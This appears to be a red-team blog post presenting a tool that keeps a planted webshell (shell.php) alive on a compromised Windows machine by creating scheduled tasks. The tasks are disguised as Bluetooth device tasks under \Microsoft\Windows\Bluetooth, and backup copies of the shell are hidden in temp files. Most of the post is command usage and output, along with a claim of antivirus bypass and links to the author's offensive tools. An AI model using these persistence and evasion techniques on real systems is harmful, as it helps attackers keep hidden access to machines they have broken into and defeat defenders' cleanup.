Add A Scheduled Task BypassAV（WEBSHELL）

Learning record

Publish Date: 2021-09-20

Update Date: 2021-09-20

Word Count: 226

Read Times: 1 Min

Read Count:

Some of the words

After Windows machine obtains target Webshell in red team task, progress maintains permissions through scheduled task, so as to avoid shell being deleted by defense

More personal tools you can go to my github:
https://github.com/YangSirrr/YangsirRedTeamTools

Actual Use

Very easy you must be know how to use, you can like this to add a plan to backup your webshell:

C:\Users\Administrator\Desktop\y>15x32.exe
Usage: + your tar exe + Which plan  Such as:
15.exe C:\WWW\1.php A
A:1m exec、B:30m exec、C:3h exec

C:\Users\Administrator\Desktop\y>15x32.exe C:\phpstudyWWW\shell.php
Usage: + your tar exe + Which plan  Such as:
15.exe C:\WWW\1.php A
A:1m exec、B:30m exec、C:3h exec

C:\Users\Administrator\Desktop\y>15x32.exe C:\phpstudyWWW\shell.php A
YourTaskname:ReinstallDeviceTask  YourTaskPath:\Microsoft\Windows\Bluetooth
YourTask Success!!!  YourTempDir:C:\Users\Public\Downloads\temp.txt
C:\Users\Administrator\Desktop\y>15x32.exe C:\phpstudyWWW\shell.php B
YourTaskname:ReinstallDeviceTasks  YourTaskPath:\Microsoft\Windows\Bluetooth
YourTask Success!!!  YourTempDir:C:\Windows\Temp\updatetemp.txt
C:\Users\Administrator\Desktop\y>15x32.exe C:\phpstudyWWW\shell.php C
YourTaskname:AutoReinstallDeviceTask  YourTaskPath:\Microsoft\Windows\Bluetooth
YourTask Success!!!  YourTempDir:C:\Windows\Temp\oldtemp.txt
C:\Users\Administrator\Desktop\y>

Manually execute to confirm program availability&BypassAV

Yangsir

https://yangsirrr.github.io/2021/09/20/add-a-scheduled-task-bypassav-webshell/

All articles in this blog are used except for special statements CC BY 4.0 reprint policy. If reproduced, please indicate source Yangsir !

Redteam Bypass ScheduledTask

Use The Registry To Bypassuac(BypassAV)

2021-09-27 Learning record

Redteam Bypass UAC

Add A Scheduled Task BypassAV

2021-09-14 Learning record

Redteam Bypass ScheduledTask